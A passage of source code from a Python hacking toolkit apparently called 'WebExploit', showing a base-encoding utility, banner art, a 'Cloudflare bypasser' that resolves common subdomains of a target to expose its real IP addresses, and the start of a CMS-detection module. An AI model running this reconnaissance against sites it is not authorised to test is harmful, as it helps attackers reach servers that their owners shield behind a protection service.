553 | # print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] {red} Can\'t Load {bold}CONNECTOR !{nbold}{yellow}Error: {bold}{connector_error}{nbold} \n')
554 |
555 |
556 |
557 | # print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] LOADED {bold} CONNECTOR {nbold} Loaded {bold}{green}Successfully...{nbold}\n')
558 |
559 |
560 |
--------------------------------------------------------------------------------
/cores/b64.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | 'pip install google-search'
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | import requests as r
31 | import paramiko
32 | from random import choice
33 | import base64
34 | import binascii
35 | except:
36 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
37 | t.sleep(1)
38 | sys.exit()
39 |
40 | black = "\033[0;30m"
41 | red = "\033[0;31m"
42 | green = "\033[0;32m"
43 | brown = "\033[0;33m"
44 | blue = "\033[0;34m"
45 | purple = "\033[0;35m"
46 | cyan = "\033[0;36m"
47 | l_gray = "\033[0;37m"
48 | dark_gray = "\033[1;30m"
49 | l_red = "\033[1;31m"
50 | l_green = "\033[1;32m"
51 | yellow = "\033[1;33m"
52 | l_blue = "\033[1;34m"
53 | l_purple = "\033[1;35m"
54 | l_cyan = "\033[1;36m"
55 | l_white = "\033[1;37m"
56 | faint = "\033[2m"
57 | italic = "\033[3m"
58 | underline = "\033[4m"
59 | blink = "\033[5m"
60 | nefative = "\033[7m"
61 | cross = "\033[9m"
62 | ended = "\033[0m"
63 | bold = "\033[1m"
64 | nbold = "\033[0m"
65 | white = f.WHITE
66 |
67 | bnr = ['''
68 | ▄▄▄▄· ▄▄▄ . ·▄▄▄▄
69 | ▐█ ▀█▪ ▀▄.▀· ██· ██
70 | ▐█▀▀█▄ ▐▀▀▪▄ ▐█▪ ▐█▌
71 | ██▄▪▐█ ▐█▄▄▌ ██. ██
72 | ·▀▀▀▀ ▀▀▀ ▀▀▀▀▀• ''', '''
73 | ▄▄▄▄ ▓█████ ▓█████▄
74 | ▓█████▄ ▓█ ▀ ▒██▀ ██▌
75 | ▒██▒ ▄██ ▒███ ░██ █▌
76 | ▒██░█▀ ▒▓█ ▄ ▒░▓█▄ ▌
77 | ▒░▓█ ▀█▓ ░▒████ ░░▒████▓
78 | ░░▒▓███▀▒ ░░ ▒░ ░ ▒▒▓ ▒
79 | ░▒░▒ ░ ░ ░ ░ ▒ ▒
80 | ░ ░ ░ ░ ░ ░
81 | ░ ░ ░ ░ ''']
82 |
83 | def r_bnr(bnr):
84 | return choice(bnr)
85 |
86 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
87 | t.sleep(2)
88 | print(f' {italic}From{ended} : ', end='')
89 | #create flush text [simple]
90 | print(f'{red}{bold}', end='', flush=True)
91 | print(f'{bold}W', end='', flush=True)
92 | t.sleep(0.5)
93 | print('e', end='', flush=True)
94 | t.sleep(0.7)
95 | print('b', end='', flush=True)
96 | t.sleep(0.4)
97 | print('E', end='', flush=True)
98 | t.sleep(0.1)
99 | print('x', end='', flush=True)
100 | t.sleep(0.2)
101 | print('p', end='', flush=True)
102 | t.sleep(0.3)
103 | print('l', end='', flush=True)
104 | t.sleep(0.4)
105 | print('o', end='', flush=True)
106 | t.sleep(0.5)
107 | print('i', end='', flush=True)
108 | t.sleep(1.5)
109 | print(f't{ended}', flush=True)
110 | nbold = "\033[0m" # tahe koskholi !
111 | t.sleep(1)
112 | print(f'{white}{nbold}')
113 | # SIMPLE TOOL !
114 | print (f'\n {bold}{f.GREEN}[{f.WHITE}B*TOOL{f.GREEN}]{f.WHITE}{f.RED} B64-DEC-ENC{f.WHITE}{bold} BASE 16,32,64,85{nbold}.DEC.ENC{nbold} DECODER T00L !\n\n\n')
115 | t.sleep(3)
116 |
117 |
118 |
119 |
120 | while True:
121 | try:
122 | string = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B64-DEC-ENC/{bold}DECODER-ENCODER{nbold}{f.WHITE} T00L . enter Your {bold}\'string{nbold}\' [ex: WebExploit | V2ViRXhwbG9pdAo=]:#{f.RED}{bold} ')
123 | print(f'{nbold}')
124 |
125 | if string:
126 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/{bold}ENC-DEC{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n')
127 | t.sleep(1)
128 | break
129 | else:
130 | continue
131 |
132 | except KeyboardInterrupt:
133 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
134 | t.sleep(2)
135 | # break
136 | sys.exit(0)
137 |
138 | t.sleep(2)
139 | strtype =input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B64-DEC-ENC/{bold}DEC-ENC{nbold}{f.WHITE} T00L . enter Your {bold}\'MODE{nbold}\' [ex: [1] DECODE, [2] ENCODE ]:#{f.BLUE}{bold} ')
140 | print(f'{nbold}')
141 | t.sleep(2)
142 |
143 | if strtype == '1' or strtype =='dec' or strtype == 'decode':
144 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/DECODER/{bold}STRING{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n')
145 | try:
146 | t.sleep(2)
147 | base16_bytes = string
148 | base16_bytes = base64.b16decode(base16_bytes)
149 | base16_message = base16_bytes.decode('ascii')
150 | t.sleep(1)
151 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}16{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base16_message}{nbold}\n')
152 | except Exception as err:
153 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}16{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 16 \'TYPE\'{nbold} Error: {err}\n')
154 |
155 | try:
156 | t.sleep(2)
157 | #string.decode('ascii')
158 | base32_bytes = string
159 | base32_bytes = base64.b32decode(base32_bytes)
160 | base32_message = base32_bytes.decode('ascii')
161 | t.sleep(1)
162 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}32{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base32_message}{nbold}\n')
163 | except Exception as err:
164 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}32{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 32 \'TYPE\'{nbold} Error: {err}\n')
165 | try:
166 | t.sleep(2)
167 | base64_bytes = string
168 | base64_bytes = base64.b64decode(base64_bytes)
169 | base64_message = base64_bytes.decode('ascii')
170 | t.sleep(1)
171 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base64_message}{nbold}\n')
172 | except Exception as err:
173 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 64 \'TYPE\'{nbold} Error: {err}\n')
174 | try:
175 | t.sleep(2)
176 | base85_bytes = string
177 | base85_bytes = base64.b85decode(base85_bytes)
178 | base85_message = base85_bytes.decode('ascii')
179 | t.sleep(1)
180 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base85_message}{nbold}\n')
181 | except Exception as err:
182 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} SKIPPING {white}{bold}BASE 85 \'TYPE\'{nbold}\n')
183 |
184 | elif strtype == '2' or strtype =='enc' or strtype == 'encode':
185 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/DECODER/{bold}STRING{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n')
186 | t.sleep(2)
187 | base16_bytes = string.encode('ascii')
188 | base16_bytes = base64.b16encode(base16_bytes)
189 | base16_message = base16_bytes.decode('ascii')
190 | t.sleep(1)
191 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{white}{bold}16{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base16_message}{nbold}\n')
192 | t.sleep(2)
193 | base32_bytes = string.encode('ascii')
194 | base32_bytes = base64.b32encode(base32_bytes)
195 | base32_message = base32_bytes.decode('ascii')
196 | t.sleep(1)
197 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{white}{bold}32{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base32_message}{nbold}\n')
198 | t.sleep(1)
199 | base64_bytes = string.encode('ascii')
200 | base64_bytes = base64.b64encode(base64_bytes)
201 | base64_message = base64_bytes.decode('ascii')
202 | t.sleep(1)
203 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base64_message}{nbold}\n')
204 | t.sleep(1)
205 | base85_bytes = string.encode('ascii')
206 | base85_bytes = base64.b85encode(base85_bytes)
207 | base85_message = base85_bytes.decode('ascii')
208 | t.sleep(1)
209 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base85_message}{nbold}\n')
210 | else:
211 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] WHAT? {bold}\'{string}\'{nbold} ? EXITTING . . .')
212 | t.sleep(2)
213 | sys.exit(0)
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
--------------------------------------------------------------------------------
/cores/baner.py:
--------------------------------------------------------------------------------
1 | def baner():
2 |
3 | from random import choice as c
4 | from colorama import Fore as cc
5 |
6 | baners = [f'''{cc.RED}
7 | ▄▄▌ ▐ ▄▌▄▄▄ .▄▄▄▄· ▄▄▄ .▐▄• ▄ ▄▄▄·▄▄▌ ▪ ▄▄▄▄▄
8 | ██· █▌▐█▀▄.▀·▐█ ▀█▪ ▀▄.▀· █▌█▌▪▐█ ▄███• ▄█▀▄ ██ •██
9 | ██▪▐█▐▐▌▐▀▀▪▄▐█▀▀█▄ ▐▀▀▪▄ ·██· ██▀·██ ▪ ▐█▌.▐▌▐█· ▐█.▪
10 | ▐█▌██▐█▌▐█▄▄▌██▄▪▐█ ▐█▄▄▌▪▐█·█▌▐█▪·•▐█▌ ▄▐█▌.▐▌▐█▌ ▐█▌·
11 | ▀▀▀▀ ▀▪ ▀▀▀ ·▀▀▀▀ ▀▀▀ •▀▀ ▀▀.▀ .▀▀▀ ▀█▄▀▪▀▀▀ ▀▀▀
12 | {cc.WHITE}''',f'''{cc.RED}
13 | \ \ / | ____| | _) |
14 | \ \ \ / _ \ __ \ __| \ / __ \ | _ \ | __|
15 | \ \ \ / __/ | | | < | | | ( | | |
16 | \_/\_/ \___| _.__/ _____|_/\_\ .__/ _| \___/ _| \__|
17 | _|
18 | {cc.WHITE}''',f'''{cc.RED}
19 | ▀▄▀▄▀ 🢇 ꔪ 🢇 🞮 ▐◣ █▄ 🞉 █ ▀█▀
20 | {cc.WHITE}''',f'''{cc.RED}
21 | █ █ ██▀ ██▄ ██▀ ▀▄▀ █▀▄ █ ▄▀▄ █ ▀█▀
22 | ▀▄▀▄▀ █▄▄ █▄█ █▄▄ █ █ █▀ █▄▄ ▀▄▀ █ █ {cc.WHITE}''',f'''{cc.RED}
23 |
24 | | | _ | ____ __ | _ o _|_
25 | |/\| (/_ |] |== >< |-' |_ [_] | |_
26 |
27 | {cc.WHITE}''',f'''{cc.RED}
28 | __ _
29 | \ / _ |_ |_ |_)| _ ._|_
30 | \/\/ (/_|_) |__><| |(_) | |_
31 |
32 | {cc.WHITE}''',f'''{cc.RED}
33 | ___
34 | \ / _ ( _ )_ _ ) __ o_)_
35 | \/\/ )_) )_) (__ (/ )_) ( (_/ ((_
36 | (_ /)(
37 |
38 | {cc.WHITE}''',f'''{cc.RED}
39 | __
40 | | | _ |_ |_ _ | _ o|_
41 | |/\|(-`|_) |__><|_)|(_)||_
42 | |
43 | {cc.WHITE}''',f'''{cc.RED}
44 | _ _ _ _ ____ _ /\ _|_
45 | | | | |_\ |__ |___ \/ |_] |/ __ . |
46 | |_|_| |__ |__] |___ /\ | | |__| | |_
47 |
48 | {cc.WHITE}''',f'''{cc.RED}
49 | _ ____ ___ ____ _ ___ _ ___ _ _____
50 | \ \ / | |_ | |_) | |_ \ \_/ | |_) | | / / \ | | | |
51 | \_\/\/ |_|__ |_|_) |_|__ /_/ \ |_| |_|__ \_\_/ |_| |_|
52 |
53 | {cc.WHITE}''',f'''{cc.RED}
54 | _ _ _ _ ___ _ _ _
55 | | | | | ___ | |_ | __]__ ___ | | ___ [_] _| |_
56 | | | | |/ ._]| . \ | _] \ \/| . \| |/ . \| | | |
57 | |__/_/ \___.|___/ |___]/\_\| _/|_|\___/|_| |_|
58 | |_|
59 | {cc.WHITE}''',f'''{cc.RED}
60 | _ _ ____ ____ ____ _ _ ____ __ _____ ____ ____
61 | ( \/\/ )( ___)( - \ ( ___)( \/ )( _ \( ) ( _ )(_ _)(_ _)
62 | ) ( )__) ) _ < )__) ) ( )___/ )(__ )(_)( _)(_ )(
63 | (__/\__)(____)(____/ (____)(_/\_)(__) (____)(_____)(____) (__)
64 |
65 | {cc.WHITE}''',f'''{cc.RED}
66 | _ _ _ _ _____ _ _ _
67 | | | | |___| |_ | __|_ _ ___| |___|_| |_
68 | | | | | -_| . | | __|_|_| . | | . | | _|
69 | |_____|___|___| |_____|_|_| _|_|___|_| |
70 | |_| |__|
71 | {cc.WHITE}''',f'''{cc.RED}
72 | █ █░ ▓█████ ▄▄▄▄ ▓█████▒██ ██▒ ██▓███ ██▓ ▒█████ ██▓▄▄▄█████▓
73 | ▓█░ █ ░█░ ▓█ ▀▓█████▄ ▓█ ▀▒▒ █ █ ▒░▓██░ ██ ▓██▒ ▒██▒ ██▒▒▓██▒▓ ██▒ ▓▒
74 | ▒█░ █ ░█ ▒███ ▒██▒ ▄██ ▒███ ░░ █ ░▓██░ ██▓▒ ▒██░ ▒██░ ██▒▒▒██▒▒ ▓██░ ▒░
75 | ░█░ █ ░█ ▒▓█ ▄▒██░█▀ ▒▓█ ▄ ░ █ █ ▒ ▒██▄█▓▒ ▒ ▒██░ ▒██ ██░░░██░░ ▓██▓ ░
76 | ░░██▒██▓ ▒░▒████░▓█ ▀█▓ ░▒████▒██▒ ▒██▒▒██▒ ░ ░▒░██████░ ████▓▒░░░██░ ▒██▒ ░
77 | ░ ▓░▒ ▒ ░░░ ▒░ ░▒▓███▀▒ ░░ ▒░ ▒▒ ░ ░▓ ░▒▓▒░ ░ ░░░ ▒░▓ ░ ▒░▒░▒░ ░▓ ▒ ░░
78 | ▒ ░ ░ ░ ░ ░ ▒░▒ ░ ░ ░ ░░ ░▒ ░░▒ ░ ░░ ░ ▒ ░ ▒ ▒░ ░ ▒ ░ ░
79 | ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ░ ▒ ░ ░
80 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
81 |
82 | {cc.WHITE}''',f'''{cc.RED}
83 | ┏┓┏┓┏┓━━━┓━━━━━━━━┓━━━━━━┓━━━━━┏┓━
84 | ┃┃┃┃┃┃━━━┃━━━━━┏━━┛━━━━━━┃━━━━━┛┗┓
85 | ┃┃┃┃┃┃━━┓┗━┓━━━┗━━┓┓┏┓━━┓┃━━━┓┓┓┏┛
86 | ┃┗┛┗┛┃┏┓┃┏┓┃━━━┏━━┛╋╋┛┏┓┃┃━┏┓┃┫┃┃━
87 | ┗┓┏┓┏┛┃━┫┗┛┃━━━┗━━┓╋╋┓┗┛┃┗┓┗┛┃┃┃┗┓
88 | ━┗┛┗┛━━━┛━━┛━━━━━━┛┛┗┛┏━┛━┛━━┛┛┗━┛
89 | ━━━━━━━━━━━━━━━━━━━━━━┃━━━━━━━━━━━
90 | ━━━━━━━━━━━━━━━━━━━━━━┛━━━━━━━━━━━
91 |
92 | {cc.WHITE}''',f'''{cc.RED}
93 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋
94 | ╭╮╭╮╭╮╋╋╋╮╋╋╋╋╋━━━╮╋╋╋╋╋╋╮╋╋╋╋╋╭╮╋
95 | ┃┃┃┃┃┃╋╋╋┃╋╋╋╋╋╭━━╯╋╋╋╋╋╋┃╋╋╋╋╋╯╰╮
96 | ┃┃┃┃┃┃━━╮╰━╮╋╋╋╰━━╮╮╭╮━━╮┃╋━━╮╮╮╭╯
97 | ┃╰╯╰╯┃╭╮┃╭╮┃╋╋╋╭━━╯╋╋╯╭╮┃┃╋╭╮┃┫┃┃╋
98 | ╰╮╭╮╭╯┃━┫╰╯┃╋╋╋╰━━╮╋╋╮╰╯┃╰╮╰╯┃┃┃╰╮
99 | ╋╰╯╰╯╋━━╯━━╯╋╋╋━━━╯╯╰╯╭━╯━╯━━╯╯╰━╯
100 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋┃╋╋╋╋╋╋╋╋╋╋╋
101 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╯╋╋╋╋╋╋╋╋╋╋╋
102 |
103 | {cc.WHITE}''',f'''{cc.RED}
104 | █ █ ██▀ ██▄ ██▀ ▀▄▀ █▀▄ █ ▄▀▄ █ ▀█▀
105 | ▀▄▀▄▀ █▄▄ █▄█ █▄▄ █ █ █▀ █▄▄ ▀▄▀ █ █
106 |
107 | {cc.WHITE}''']
108 | return c(baners)
109 |
110 |
111 |
112 |
113 |
114 |
115 |
--------------------------------------------------------------------------------
/cores/cfb.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | try:
26 | import time as t
27 | from colorama import Fore as f
28 | import sys, os
29 | import socket
30 | from random import choice
31 | except:
32 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
33 | t.sleep(1)
34 | sys.exit()
35 |
36 | black = "\033[0;30m"
37 | red = "\033[0;31m"
38 | green = "\033[0;32m"
39 | brown = "\033[0;33m"
40 | blue = "\033[0;34m"
41 | purple = "\033[0;35m"
42 | cyan = "\033[0;36m"
43 | l_gray = "\033[0;37m"
44 | dark_gray = "\033[1;30m"
45 | l_red = "\033[1;31m"
46 | l_green = "\033[1;32m"
47 | yellow = "\033[1;33m"
48 | l_blue = "\033[1;34m"
49 | l_purple = "\033[1;35m"
50 | l_cyan = "\033[1;36m"
51 | l_white = "\033[1;37m"
52 | faint = "\033[2m"
53 | italic = "\033[3m"
54 | underline = "\033[4m"
55 | blink = "\033[5m"
56 | nefative = "\033[7m"
57 | cross = "\033[9m"
58 | ended = "\033[0m"
59 | bold = "\033[1m"
60 | nbold = "\033[0m"
61 | white = f.WHITE
62 |
63 | bnr = ['''
64 | ▄████▄ █████ ▄▄▄▄
65 | ▒██▀ ▀█ ▓██ ▓█████▄
66 | ▒▓█ ▄ ▒████ ▒██▒ ▄██
67 | ▒▓▓▄ ▄██ ░▓█▒ ▒██░█▀
68 | ▒ ▓███▀ ▒░▒█░ ▒░▓█ ▀█▓
69 | ░ ░▒ ▒ ░ ▒ ░ ░░▒▓███▀▒
70 | ░ ▒ ░ ░ ░▒░▒ ░
71 | ░ ░ ░ ░ ░
72 | ░ ░ ░ ░ ░ ''', '''
73 | ▄▄· ·▄▄▄ ▄▄▄▄·
74 | ▐█ ▌▪ █ · ▐█ ▀█▪
75 | ██ ▄▄ █▀▀▪ ▐█▀▀█▄
76 | ▐███▌ ██ . ██▄▪▐█
77 | ·▀▀▀ ▀▀▀ ·▀▀▀▀ ''']
78 |
79 | def r_bnr(bnr):
80 | return choice(bnr)
81 |
82 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
83 | t.sleep(2)
84 | print(f' {italic}From{ended} : ', end='')
85 | #create flush text [simple]
86 | print(f'{red}{bold}', end='', flush=True)
87 | print(f'{bold}W', end='', flush=True)
88 | t.sleep(0.5)
89 | print('e', end='', flush=True)
90 | t.sleep(0.7)
91 | print('b', end='', flush=True)
92 | t.sleep(0.4)
93 | print('E', end='', flush=True)
94 | t.sleep(0.1)
95 | print('x', end='', flush=True)
96 | t.sleep(0.2)
97 | print('p', end='', flush=True)
98 | t.sleep(0.3)
99 | print('l', end='', flush=True)
100 | t.sleep(0.4)
101 | print('o', end='', flush=True)
102 | t.sleep(0.5)
103 | print('i', end='', flush=True)
104 | t.sleep(1.5)
105 | print(f't{ended}', flush=True)
106 | nbold = "\033[0m" # tahe koskholi !
107 | t.sleep(1)
108 | print(f'{white}{nbold}')
109 |
110 | print (f'\n {bold}{f.GREEN}[{f.WHITE}CFB{f.GREEN}]{f.WHITE}{f.RED} C.F.B{f.WHITE}{bold} C{nbold}LOAD {bold}F{nbold}LARE {bold}B{nbold}YPASSER T00L !\n\n\n')
111 | t.sleep(3)
112 |
113 |
114 | while True:
115 | try:
116 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}C.F.B/{bold}URL{nbold}{f.WHITE} enter \'{bold}URL{nbold}\' [ex: youtube.com]:#{f.GREEN}{bold} ')
117 | print(f'{nbold}')
118 |
119 | if url:
120 | if 'http' not in url:
121 | break
122 | if 'https://' not in url:
123 | break
124 | else:
125 | print(f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] ENTER URL WITHOUT {bold}HTTP:// OR HTTPS://{nbold} TRY AGAIN . . .\n')
126 | t.sleep(1)
127 | continue
128 | else:
129 | continue
130 | except KeyboardInterrupt:
131 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
132 | t.sleep(2)
133 | # break
134 | sys.exit(0)
135 |
136 | subdomain = (f'{os.getcwd()}/cores/subdomains.txt')
137 | subdomains = open(subdomain, 'r').read().split()
138 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.F.B/{f.CYAN}DEFAULT{f.WHITE}] OPENNING {bold}DEFAULT{nbold} TOP SUBDOMAINS FILE {bold}{f.GREEN}\n')
139 | t.sleep(2)
140 | print (f' {nbold}{f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] LOADED {bold}%s SUBDOMAINS{nbold}{f.GREEN} SUCCESS ...{white}\n' % len(subdomains))
141 | t.sleep(2)
142 | try:
143 | for sub in subdomains:
144 | try:
145 | finally_host = str(sub) + "." + str(url)
146 | bypassed_host = socket.gethostbyname(str(finally_host))
147 |
148 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}CFB/{f.WHITE}STATUS-{bold}{f.GREEN}SUCCESS{nbold}{f.WHITE}] REAL-IP-ADDR {f.WHITE}~> [{f.GREEN}{bold}{bypassed_host}{nbold}{f.WHITE}]---[{finally_host}] \n')
149 |
150 | except Exception as socket_err:
151 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}CFB/{f.WHITE}STATUS-{bold}{f.RED}ERROR{nbold}{f.WHITE}] CAN\'T BYPASS ERROR: {f.WHITE}~> [{f.RED}{bold}{socket_err}{nbold}{f.WHITE}]---[{finally_host}] \n')
152 | except KeyboardInterrupt:
153 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
154 | t.sleep(2)
155 | sys.exit(0)
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/cores/cms.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | try:
26 | import time as t
27 | from colorama import Fore as f
28 | import sys, os
29 | import builtwith
30 | from random import choice
31 | except:
32 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
33 | t.sleep(1)
34 | sys.exit()
35 |
36 | black = "\033[0;30m"
37 | red = "\033[0;31m"
38 | green = "\033[0;32m"
39 | brown = "\033[0;33m"
40 | blue = "\033[0;34m"
41 | purple = "\033[0;35m"
42 | cyan = "\033[0;36m"
43 | l_gray = "\033[0;37m"
44 | dark_gray = "\033[1;30m"
45 | l_red = "\033[1;31m"
46 | l_green = "\033[1;32m"
47 | yellow = "\033[1;33m"
48 | l_blue = "\033[1;34m"
49 | l_purple = "\033[1;35m"
50 | l_cyan = "\033[1;36m"
51 | l_white = "\033[1;37m"
52 | faint = "\033[2m"
53 | italic = "\033[3m"
54 | underline = "\033[4m"
55 | blink = "\033[5m"
